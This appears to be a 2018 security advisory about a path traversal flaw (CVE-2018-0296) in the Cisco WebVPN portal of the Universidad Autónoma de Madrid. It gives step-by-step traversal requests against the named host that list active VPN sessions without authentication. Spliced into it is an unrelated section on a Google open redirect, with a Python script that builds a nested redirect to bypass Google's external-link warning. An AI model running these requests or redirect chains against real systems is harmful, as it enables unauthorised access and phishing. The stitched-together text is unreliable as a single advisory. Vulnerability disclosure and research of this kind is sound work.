2018-004: Traversal Directory en VPN de la UAM (Universidad Autónoma de Madrid)

Original release date: 09/08/2018
Last revised: 09/08/2018
Discovered by: Jorge Lajara
Severity: 5.0 CVSSv2
Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P)

BACKGROUND

The Remote Access Service (VPN) of the UAM (Universidad Autónoma de Madrid) is vulnerable to CVE-2018-0296, the path traversal in the web interface of Cisco ASA / WebVPN (the service behind the +CSCOE+ and +CSCOU+ paths used below).

DESCRIPTION

The vulnerability is due to the lack of proper input validation of the URL path in HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to cause a DoS condition (reload of the device) or to obtain information without authentication. This vulnerability applies to both IPv4 and IPv6 HTTP traffic.

PROOF OF CONCEPT

1) Navigate to https://vpn.uam.es/+CSCOE+/logon.html#form_title_text to confirm the host serves the Cisco WebVPN portal.
2) Send a request to https://vpn.uam.es/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/ (the "/.." segment must reach the device unchanged) to list the active VPN sessions.
3) Check the response: an affected device answers with HTTP 200 and a JSON listing of the /sessions/ directory without any authentication.

When a user searches for an image, Google generates a link like the following:

https://www.google.com/url?sa=i&url=https%3A%2F%2Felpais.com%2Felpais%2F2017%2F02%2F13%2Fciencia%2F1486986287_013868.html&psig=AOvVaw32qmRyOt4_pkNDMqoVlPeb&ust=1583227169251000&source=images&cd=vfe&ved=0CAIQjRxqFwoTCOjR6_m6--cCFQAAAAAdAAAAABAE

The "url" parameter is not properly validated, so an open redirect can be exploited through this parameter.

Only this parameter is mandatory, so the other parameters can be dropped from the GET request without affecting the result:

https://www.google.com/url?&url=

How to reproduce the vulnerability:

1. Choose the target URL
For example:
https://www.isecauditors.com

2. Wrap the target in a redirect through Google Translate, so that the Google warning page shown for external targets is not displayed

https://translate.google.com/translate?sl=auto&tl=en&u=

For example:

https://translate.google.com/translate?sl=auto&tl=en&u=www.isecauditors.com

3. Percent-encode the redirect URL so that it survives as a single value of the "url" parameter (its own "?", "=" and "&" must not be interpreted by www.google.com)

Any URL encoder will do, for example "https://meyerweb.com/eric/tools/dencoder/".

For example:

https%3A%2F%2Ftranslate.google.com%2Ftranslate%3Fsl%3Dauto%26tl%3Den%26u%3Dwww.isecauditors.com

4. Build the final URL, which redirects to the target without the Google warning

https://www.google.com/url?sa=i&url=https%3A%2F%2Ftranslate.google.com%2Ftranslate%3Fsl%3Dauto%26tl%3Den%26u%3Dwww.isecauditors.com
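Steps 1 to 4 as one function, plus a decoder that walks the redirect chain back to the target without sending any request. This is an added example, not part of the original advisory; the only facts taken from the page are the two Google endpoints and the parameter names. The point worth noticing is `quote(..., safe="")`: Python's default `quote` leaves "/" unencoded, which would not produce the value shown in step 3.

```python
"""Build and decode the nested Google redirect from the steps above (added example)."""
from urllib.parse import parse_qs, quote, urlencode, urlsplit

GOOGLE_REDIRECT = "https://www.google.com/url"            # outer open redirect, parameter "url"
GOOGLE_TRANSLATE = "https://translate.google.com/translate"  # inner hop, parameter "u"


def translate_wrapper(target: str) -> str:
    """Step 2: a translate.google.com URL that forwards to the target."""
    return GOOGLE_TRANSLATE + "?" + urlencode({"sl": "auto", "tl": "en", "u": target})


def final_url(target: str) -> str:
    """Steps 3 and 4: percent-encode the wrapper and place it in the outer 'url' parameter.

    safe="" forces ':' and '/' to be encoded as well, so the inner query
    ('?sl=auto&tl=en&u=...') cannot be split off by the outer parser.
    """
    return GOOGLE_REDIRECT + "?sa=i&url=" + quote(translate_wrapper(target), safe="")


def decode_chain(url: str) -> list:
    """Follow the 'url' and then 'u' parameters back to the final target.

    Returns [outer_url, translate_url, target]; stops early if a hop is missing.
    parse_qs already percent-decodes, so the first hop yields the plain
    translate URL and the second one the plain target.
    """
    chain = [url]
    current = url
    for param in ("url", "u"):
        qs = parse_qs(urlsplit(current).query)
        if param not in qs:
            break
        current = qs[param][0]
        chain.append(current)
    return chain


if __name__ == "__main__":
    built = final_url("www.isecauditors.com")
    print(built)
    for hop in decode_chain(built):
        print("  ->", hop)
```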

BUSINESS IMPACT

An unauthenticated attacker can cause a denial of service (device reload) or obtain arbitrary information, such as the list of active VPN sessions, through directory traversal techniques.

SYSTEMS AFFECTED

https://vpn.uam.es/+CSCOE+/logon.html#form_title_text

SOLUTION

-

REVISION HISTORY

09/08/2018 : Initial release

DISCLOSURE TIMELINE

  • 27/07/2018 : Vulnerability identified by Internet Security Auditors (www.isecauditors.com).
  • 27/07/2018 : Contact with the UAM Security Team.
  • 07/08/2018 : Vulnerability fixed by the UAM Security Team.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain- and Colombia-based company and a leader in web application testing, network security, penetration testing, and security compliance implementation and assessment. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ICT, etc. We are a vendor-independent provider with deep expertise since 2001. Our R&D efforts include vulnerability research, collaboration with open security projects, whitepapers, presentations, and participation in and promotion of security events. For further information regarding our security services, contact us.